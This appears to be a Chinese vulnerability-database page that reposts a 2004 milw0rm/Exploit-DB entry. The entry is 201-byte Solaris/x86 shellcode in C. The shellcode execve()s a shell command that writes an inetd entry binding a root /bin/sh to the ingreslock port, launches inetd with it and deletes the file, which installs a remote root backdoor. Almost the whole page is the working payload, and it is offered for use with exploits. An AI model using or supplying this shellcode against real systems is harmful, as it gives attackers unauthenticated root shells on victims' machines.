Solaris/x86 - inetd Add Service + execve() Shellcode (201 bytes)

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1054635 漏洞类型
发布时间 2004-09-26 更新时间 2004-09-26
CVE编号 N/A CNNVD-ID N/A
漏洞平台 Solaris_x86 CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/13502
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
/*
 *  Solaris/x86
 *
 *  Just execve()'s the following:
 *   "echo \"ingreslock stream tcp nowait root /bin/sh sh -i\">/tmp/x;"
 *   "/usr/sbin/inetd -s /tmp/x; /bin/rm -f /tmp/x";
 *
 *  for a trivial remote bd. Used in a few old Solaris/x86 remote exploits. 
 */
 
char c0de[] =
"\xeb\x3d\x9a\x24\x24\x24\x24\x07\x24\xc3\x5e\x29\xc0\x89\x46\xbf\x88\x46\xc4"
"\x89\x46\x0c\x88\x46\x17\x88\x46\x1a\x88\x46\x78\x29\xc0\x50\x56\x8d\x5e\x10"
"\x89\x1e\x53\x8d\x5e\x18\x89\x5e\x04\x8d\x5e\x1b\x89\x5e\x08\xb0\x3b\xe8\xc6"
"\xff\xff\xff\xff\xff\xff\xe8\xc6\xff\xff\xff\x01\x01\x01\x01\x02\x02\x02\x02"
"\x03\x03\x03\x03\x04\x04\x04\x04"
"\x2f\x62\x69\x6e\x2f\x73\x68\x20\x2d\x63\x20"
"echo \"ingreslock stream tcp nowait root /bin/sh sh -i\">/tmp/x;"
"/usr/sbin/inetd -s /tmp/x; /bin/rm -f /tmp/x";

/* EOF */

# milw0rm.com [2004-09-26]